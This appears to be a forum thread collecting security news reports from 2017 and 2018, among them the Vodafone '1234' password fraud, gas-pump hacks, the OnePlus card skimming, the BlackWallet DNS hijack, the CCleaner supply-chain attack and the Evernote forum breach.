  14. Hackers are behind bars for stealing $30,000 from accounts, but Vodafone wants their victims to pay the tab. If you use a simple, easy-to-guess password such as "QWERTY" or "1234," you might pay for your mistake by having someone access your online accounts without permission -- and you may also find yourself paying out for subsequent damages and lost funds. That is, if Vodafone reportedly has its way. Recently, a court in Teplice, Czech Republic, sentenced two individuals to jail for compromising the accounts of Vodafone customers in order to make fraudulent mobile payments. According to local media idnes.cz, two men were able to access customer accounts by testing out "1234" as a password, enabling them to order new SIM cards without permission which were picked up at local branches. These SIM cards were activated and used in mobile phones without any further authentication, as the attackers already knew the phone number and name associated with each compromised account. Once active, the SIMs were used to send premium SMS messages to gambling services. The publication says that 667,000 crowns were stolen through the scheme, which began in April 2017. This equates to roughly $30,000. Some customers impacted by the breach say that the "1234" password was set by default by Vodafone. It appears that access to the online self-service shop which the attackers exploited is automatic, but customers may not have been aware of the service at all at sign-up. The men have been sentenced to three and two years in jail, respectively. Vodafone, however, is reportedly refusing to pay up and wants the victims to cover the damages. According to idnes.cz, Vodafone has argued the customers are at fault as they are responsible for the strength of their password. A Vodafone spokesperson told the publication that the default, weak password was not an automatic element; but rather, employees were able to set up an account with "1234" if customers could not decide on their password choice in-store -- but they would have been warned to change it to something stronger later. A number of victims have denied knowing the supermarket existed at all until the time of the theft. The publication reports that some account holders impacted by the scheme have received debt collectors at their door to recoup lost funds. "If the account was misused by an unknown offender, the correct procedure is that the customer will report the situation to the Czech police and file a criminal complaint," the Vodafone spokesperson said. "Unfortunately, we cannot compensate for the charged amount." Jiri Kropac, the head of Threat Detection Labs at ESET, tested the portal on behalf of Bleeping Computer and confirmed that the portal's inherent security is poor as a password can only consist of four to six numbers. This is not difficult to brute-force attack. Vodafone's apparent stance on the robbery is a dangerous one -- but it is not a mindset which hasn't been raised before. Former UK Met Police chief Sir Bernard Hogan-Howe, when he was in his previous role, said that customers who become victims of financial fraud should not be compensated by banks. Some banks argue that if a payment is made voluntarily, they should not be held responsible for such losses. In 2015, Vodafone experienced a data breach which led to the theft of sensitive information belonging to 1,827 UK customers. The telecoms giant said the cyberattack was not due to vulnerable company systems, but rather, email address and password credentials were taken "from an unknown source" outside of Vodafone. ZDNet has reached out to Vodafone and will update if we hear back. Source
  15. When we talk about hacking, we usually think of a massive cyber attack on any financial institution. But, from recent hacks and data breach incidents, it seems the hackers have changed their targets. Recently, some crooks tried an not entirely new (and somewhat weird) trick to achieve their goal. These hackers hacked a US gas station to pilfer 600 gallons of fuel worth $1,800 and did so brazenly in the middle of the day. Hackers Hacked A Detroit Gas Station As initially disclosed on Wednesday, individuals hacked a Detroit, Michigan gas station to steal 600 gallons of gas. The Marathon gas station suffered this attack on June 23, 2018, when two men reached the pump for fuel. Reportedly, they took control of the pump at the gas station through a remote device, thus preventing the hack from being blocked by the clerk present at the station from his system. According to Fox2Detroit, the clerk, Aziz Awadh, said about the incident, “I tried to stop it here from the screen but the screen’s not working. I tried to stop it from the system; nothing working.” Awadh told that he was able to shut down the pump only after he found the emergency kit. He then called the police. However, until then, the hackers managed to drain a large volume of fuel. Police Asks For Help To Identify Culprits According to the initial Police investigations, the hackers used a unique remote device to take over the pump. The hackers are believed to have had 10 vehicles which they filled completely within 90 minutes. However, as the security cameras were working perfectly, those hackers have been captured in the video recording. While the investigations continue about the matter, the Detroit Police Department has requested the public to inform them if anyone gets to know anything about the thieves. < Here >
  16. Alt-currency's value tumbles amid malicious mining mishaps The Verge cryptocurrency has seen its value drop by 25 per cent after hackers exploiting a bug in the alt-coin's software forced its developers to hit the reset button and hard-fork the currency. Programmers on Wednesday confirmed that the fun-bux had been on the receiving end of a "small hash attack" that caused its value to drop from $0.07 to $0.05 per XVG. The developers claimed they had cleared up what was portrayed as a minor hiccup.
  17. Authorities in Russia have broken up a widespread scheme involving dozens of gas-station employees who used software programs on electronic gas pumps to con customers into paying for more fuel than then actually pumped into their tank. The scam shorted customers between 3-to-7 percent per gallon of gas pumped. On Saturday, Russian Federal Security Service (FSB) arrested hacker Denis Zayev in Stavropol, Russia on charges he created several software programs designed to swindler gas customers, according to multiple Russian media reports. The software was found only on gas stations located predominantly throughout the south of Russia. The FSB did not return email request for comment on this story. Zayev is accused of developing the software programs and selling them to rogue gas-station employees. Under the arraignment, both gas-station employees and Zayev received a cut of the money customers overpaid for gas. According to the FSB, the crime earned Zayev and gas station employees “hundreds of millions of rubles.” A translated report from news source Rosbalt said the malicious software was nearly impossible to detect by local inspectors and oil companies that monitor gasoline inventory remotely. According to the report, not only did pumps display false data, but also cash registers and back-end systems. Next, Zayev’s software was able to cloak sales data tied to the sale of a station’s illicit surplus gasoline. It’s unclear what tipped Russian authorities off to the scam. Hackers targeting gas stations isn’t new. In 2014, New York state authorities charged 13 men for using Bluetooth-enabled skimmers to steal more than $2 million from customers at gas stations across the Southern United States between 2012 and 2013. A 2015 Black Hat presentation by researchers Kyle Wilhoit and Stephen Hilt, also highlighted dangers of a growing number of internet-exposed gas pump monitoring systems in the U.S. They warned exposed SCADA systems could allow malicious actors to carry out DDoS attacks against pumps, register incorrect fill data and damage engines by manipulating pumps to serve diesel fuel instead of unleaded. Article
  18. A user at Resetera.com has announced that the hack version of PlayStation 4 (PS4 4.05) is now available and hence, the opportunity for targeting the highly sought-after Sony device is ripe. As per DanteLinkX, the user who posted about the hack, it is possible to load or dump PS4 files into ‘.pkg’ format and then load them on firmware version 4.05. Moreover, there are multiple dumps that are compatible with version 4.05 PS4 games and these are being distributed on the internet wildly. “Supposedly a hack for firmware 5.01 is on the way too,” said DanteLinkX. This new hack has been dubbed as PS4HEN. It has the capability of modifying the console at the software level to allow homebrew applications to be executed and run. In simple words, it converts the regular PS4 console into a developer’s kit. Hackers used PS4HEN to emulate PS2 games so as to boost PS4 library. Perhaps, people are now playing pirated PS4 games that too on compromised version of PS4. V 4.05, for instance, Doom VFR and Dead Rising 4. Furthermore, the PKG Kitchen tool allows games like GTA V, Uncharted 4 and similar others to be dumped online for users to play. However, the process of playing pirated system is not only complicated but detrimental to the machine itself. There are a number of free games available on PSN so you can opt for them but if you really intend to get your console hacked then we suggest that you wait for more information on the hacking tools and the consequences of their usage. A statement is due to be released by Sony regarding this issue but you need to remember that hacking PS4 will instantly render its warranty void and it would become impossible to sell your machine to local vendors. If you try to remove the hack even then you will be facing compatibility issues. You can learn more about the hack by following this link. https://www.hackread.com/playstation-4-hacked-to-run-ps2-emulation-homebrew-software/
  19. On Dec. 22, 2017, the Royal Canadian Mounted Police (RCMP) charged Jordan Evan Bloom of Thornhill, Ontario for trafficking in identity information, unauthorized use of a computer, mischief to data, and possession of property obtained by crime. Bloom is expected to make his first court appearance today. According to a statement from the RCMP, “Project Adoration” began in 2016 when the RCMP learned that LeakedSource.com was being hosted by servers located in Quebec. “This investigation is related to claims about a website operator alleged to have made hundreds of thousands of dollars selling personal information,” said Rafael Alvarado, the officer in charge of the RCMP Cybercrime Investigative Team. “The RCMP will continue to work diligently with our domestic and international law enforcement partners to prosecute online criminality.” In January 2017, multiple news outlets reported that unspecified law enforcement officials had seized the servers for Leakedsource.com, perhaps the largest online collection of usernames and passwords leaked or stolen in some of the worst data breaches — including three billion credentials for accounts at top sites like LinkedIn and Myspace. LeakedSource in October 2015 began selling access to passwords stolen in high-profile breaches. Enter any email address on the site’s search page and it would tell you if it had a password corresponding to that address. However, users had to select a payment plan before viewing any passwords. The RCMP alleges that Jordan Evan Bloom was responsible for administering the LeakedSource.com website, and earned approximately $247,000 from trafficking identity information. A February 2017 story here at KrebsOnSecurity examined clues that LeakedSource was administered by an individual in the United States. Multiple sources suggested that one of the administrators of LeakedSource also was the admin of abusewith[dot]us, a site unabashedly dedicated to helping people hack email and online gaming accounts. That story traced those clues back to a Michigan man who ultimately admitted to running Abusewith[dot]us, but who denied being the owner of LeakedSource. The RCMP said it had help in the investigation from The Dutch National Police and the FBI. The FBI could not be immediately reached for comment. Article
  20. If you are a OnePlus customer and bought their products through their website between mid-November 2017 and January 11, 2018, chances are that your credit card data has been stolen. OnePlus, the Chinese smartphone manufacturer has acknowledged that its website was hacked and breached by hackers who stole credit card data belonging to around 40,000 customers. Background On January 15th, 2017, HackRead published an in-depth report on OnePlus customers complaining about credit card fraud and claiming that their cards had been used to make purchases without their knowledge and permission after shopping through the OnePlus website (OnePlus.net) between October and December 2017. In reply, OnePlus had denied that their checkout page was hacked or breached. However, according to Fidus InfoSecurity Limited, a British cybersecurity agency, OnePlus checkout was using Magento eCommerce platform that was in the news lately for containing a critical bug that could be exploited to take over any website. Remember, the same bug was used by a Coinhive user to hack BlackBerry mobile website and place Monero cryptocurrency mining code. Furthermore, Fidus pointed out several loopholes in the OnePlus website and concluded that there is a chance OnePlus website could be compromised by placing Javascript and modifying the Cc.php file which requires shell access to the server and indicates a serious compromise. OnePlus admits it suffered data breach Earlier today (January 19th, 2017), according to the official forum post by OnePlus’ staff member Mingyu it has been acknowledged that the company did suffer a hack attack in which hackers infected a malicious script into the company’s payment page code and siphoned out credit card data. One of our systems was attacked, and a malicious script was injected into the payment page code to sniff out credit card information from customers who were entering the data on OnePlus.net. However, OnePlus maintains that customers who used saved credit cards or paid via the “Credit Card via PayPal” and those who bought OnePlus products via PayPal should not be affected. OnePlus also sent emails to potentially affected customers informing that their credit card data including card numbers, expiry date, and security codes were stolen between mid-November 2017 and January 11, 2018. Moreover, the company has contacted law enforcement authorities in regions it operates in and offered free credit monitoring to affected customers. “We cannot apologize enough for letting something like this happen. We are eternally grateful to have such a vigilant and informed the community, and it pains us to let you down.” “We are working with our current payment providers to implement a more secure credit card payment method, as well as conducting an in-depth security audit. All these measures will help us prevent such incidents from happening in the future,” said Mingyu. source
  21. As the price of Bitcoin and other cryptocurrencies is surging, the cybercriminal community is exploring the opportunity to steal user funds as every now and then there are incidents involving hackers targeting unsuspecting investors by hacking an exchange and a wallet. The latest victim of a hack attack against cryptocurrencies is the web-based BlackWallet used in storing Stellar Lumens (XLM). Reportedly, hackers successfully targeted BlackWallet this weekend (January 13th) and stole $444,000 in XLM. How hackers hacked BlackWallet The incident has been confirmed by the admin and creator of Blackwallet and an official statement has also been posted on Reddit according to which hackers compromised the hosting account of BlackWallet’s website (BlackWallet.co) then hijacked its DNS (Domain Name Servers) and redirected to a fake website that looked exactly like Blackwallet’s. Following the change, the moment an unsuspected user signed in on the fake website their funds would go straight to the wallet owned by hackers. Moreover, hackers placed a code that with every sign in, would move 20 Lumens (that are needed to keep the wallet intact) to their account. In total, hackers were able to transfer Stellar Lumens (XLM) worth $444,000 majority of which went to SDF and Bittrex cryptocurrency exchange where hackers will probably convert the stolen funds without getting their identity exposed. According to a Tweet by Kevin Beaumont‏, an IT security researcher who examined the code placed by hackers “The DNS hijack of Blackwallet injected code if you had over 20 Lumens it pushes them to a different wallet.” What is next The creator of BlackWallet, on the other hand, has asked hosting firm to disable their account. They have also contacted SDF and Bittrex to freeze the stolen funds however it is unclear if both parties will be able to cooperate or whether there has been any response from them. The BlackWallet admin is also suggesting customers immediately transfer their funds to some other wallet in the event they entered their key on blackwallet. Users can transfer their funds using the stellar account viewer. At the time of publishing this article, BlackWallet’s website was offline and displaying a 403 error. To read previous data breaches and hack attacks against cryptocurrency wallets and exchanges follow this link. source
  22. Extortion can also be funny when it happens to the bad guys, and there's one extortion attempt going on right now that will put a big smile on your face. The victim is Basetools.ws, an underground hacking forum that allows users to trade stolen credit card information, profile data, and spamming tools. The site boasts to have over 150,000 users and over 20,000 tools listed in its forums. Earlier this week, on Tuesday, an anonymous user appears to have breached the site, and uploaded samples of its database online, along with a ransom demand. The attacker is asking for $50,000 or he'll share data on the site's administrator with US authorities, such as the FBI, DHS, DOJ, and the DOT (Department of Treasury). To prove the validity of his claims, the hacker shared an image of the Basetools admin panel and an image containing the site admin's login details and IP address. In addition, the hacker also dumped tools that Basetools users were selling on the site, such as login credentials for C-Panel accounts; login credentials for shells, backdoors, and spambots hosted on hacked sites; credentials for RDP servers; server SSH credentials, user data leaked from various breaches at legitimate sites, and many other more. As soon as the ransom demand and accompanying data was published online, the Basetools portal went offline and entered maintenance mode. "Yeah, the fact that site is down right now certainly doesn't look good for them," security researcher Dylan Katz told Bleeping Computer today regarding the possibility of the ransom demand being a fake breach. Nonetheless, "50k is a pretty steep ransom, seeing as the damange has already been done," Katz added. But financial gain is not the only motivation behind this hack. According to other text included in the ransom demand, the hacker also appears to have carried out the hack out of revenge, claiming the site's operator has been manipulating stats. "Basetools.pw is manipulating EARNING STATS & RESELLER STATS, Owner of this market has opened a reseller with name RedHat which always stays in First Place," the text reads. Lots of sensitive data leaked online Despite the "small potatoes" feel that you get when reading about a breach at a hackers' forum, this security incident is quite of note. All the Basetools seller data that was supposedly being sold on the forums before the hack is now online and easily accessible to anyone. This means that credentials for thousands of servers are now in easy reach to anyone who knows where to look for it. Other hackers could take over these servers and deploy them in spam, malware hosting, or other malicious campaigns. The owners of these services will need to be notified so they can change credentials and clean up affected systems. Furthermore, Katz has also identified user data that appears to come from services that have not previously announced they suffered a data breach. These services will also need to be notified so they can investigate any potential breaches, and reset passwords for affected accounts. Katz is currently processing the leaked data and intends to reach out to some of the affected parties. Article
  23. Hackers broke into British company Piriform’s free software for optimizing computer performance last month potentially allowing them to control the devices of more than two million users, the company and independent researchers said on Monday. The malicious program was slipped into legitimate software called CCleaner, which is downloaded for personal computers and Android phones as often as five million times a week. It cleans up junk programs and advertising cookies to speed up devices. CCleaner is the main product made by London’s Piriform, which was bought in July by Prague-based Avast, one of the world’s largest computer security vendors. At the time of the acquisition, the company said 130 million people used CCleaner. A version of CCleaner downloaded in August included remote administration tools that tried to connect to several unregistered web pages, presumably to download additional unauthorized programs, security researchers at Cisco’s (CSCO.O) Talos unit said. Talos researcher Craig Williams said it was a sophisticated attack because it penetrated an established and trusted supplier in a manner similar to June’s “NotPetya” attack on companies that downloaded infected Ukrainian accounting software. “There is nothing a user could have noticed,” Williams said, noting that the optimization software had a proper digital certificate, which means that other computers automatically trust the program. In a blog post, Piriform confirmed that two programs released in August were compromised. It advised users of CCleaner v5.33.6162 and CCleaner Cloud v1.07.3191 to download new versions. A spokeswoman said that 2.27 million users had downloaded the August version of CCleaner while only 5,000 users had installed the compromised version of CCleaner Cloud. Piriform said that Avast, its new parent company, had uncovered the attacks on Sept. 12. A new, uncompromised version of CCleaner was released the same day and a clean version of CCleaner Cloud was released on Sept. 15, it said. The nature of the attack code suggests that the hacker won access to a machine used to create CCleaner, Williams said. CCleaner does not update automatically, so each person who has installed the problematic version will need to delete it and install a fresh version, he said. Williams said that Talos detected the issue at an early stage, when the hackers appeared to be collecting information from infected machines, rather than forcing them to install new programs. Piriform said it had worked with U.S. law enforcement to shut down a server located in the United States to which traffic was set to be directed. It said the server was closed down on Sept. 15 “before any known harm was done”. Source
  24. Just a few hours ago, the Official website of the Tails Operating System has been hacked and it appears that a self-proclaimed 17-year old hacker breached and defaced it. Tails is a Linux-based highly secure Operating System, specially designed and optimized to preserve users' anonymity and privacy. Hacker, who named himself "Sum guy", managed to access the website as administrator and edited the homepage content with the following message: You has been haxoredeszed by sum dumb 17 year old by accident... Sorry about that please forgive me! I accidentally logged myself in as someone important and changed the site, not knowing that what I was changing would save! So sorry about that... I hope you have a backup, Oh and btw I love your OS! Yours sincerely, Sum guy And before I leave, Hi ed... and zoin Defaced Link: https://tails.boum.org/index.en.html. However, all other pages on the Tails website are working just fine, but at this moment it is not clear whether the hacker has also modified the OS Image or not. So readers are advised to do not download the Tails OS from the website, at least for a few days. Tails, also known as 'Amnesiac Incognito Live System', is free software based on Debian GNU/Linux and you install it on a DVD or USB drive, boot up the computer from the drive. This allows you to work on a sensitive file on any computer and prevent the data being recovered after the computer is turned off. Tails was reportedly used by the NSA Whistle-blower Edward Snowden in discussions with journalists because it includes a range of tools for protecting your data by means of strong encryption. I will update the story after receiving more details on the hack. Stay Tuned. Source
  25. Note-taking and archiving app Evernote has announced that its discussion forum has been hacked, compromising some users’ passwords, dates of birth and email addresses. The hack was revealed yesterday afternoon in a post by an Evernote forum admin, saying that “The vendor that operates https://discussion.evernote.com has notified us that they had been hacked. The hacker was able to retrieve our forum members’ profile information. We don’t believe that the hacker accessed any private forum messages.” The company was at pains to emphasise that only forum passwords dating from 2011 or earlier were compromised, and not passwords for Evernote itself. Users notes themselves are secure. However, as security expert Graham Cluley points out, users may be vulnerable if they re-used their forum password elsewhere. Users who joined Evernote after 2011 should not need to change their passwords, as Evernote introduced a single password system for the forum and the app, a system which did not see password data sent to the third party responsible for hosting the forum. According to ZDnet, the Evernote forum currently has 164,644 registered members; Evernote has not disclosed how many were affected by the hack. Evernote has reached out to the users who were affected. According to posts on the forumdiscussing the hack, passwords which were compromised had been ‘hashed’ – encrypted to provide a basic level of protection. Last Tuesday Evernote was the subject of a denial-of-service (DOS) attack that stopped users accessing their accounts. The DOS attack had been repelled by the following day, and Evernote reassured customers that no hacking had taken place during the attack. Following a major hack in 2013 that saw intruders able to re-set user passwords and access full personal details, Evernote introduced an optional two-factor authentication system, whereby users could use a code sent to their smartphone to prove their identity. Evernote has more than 100m users. Source
  • Create New...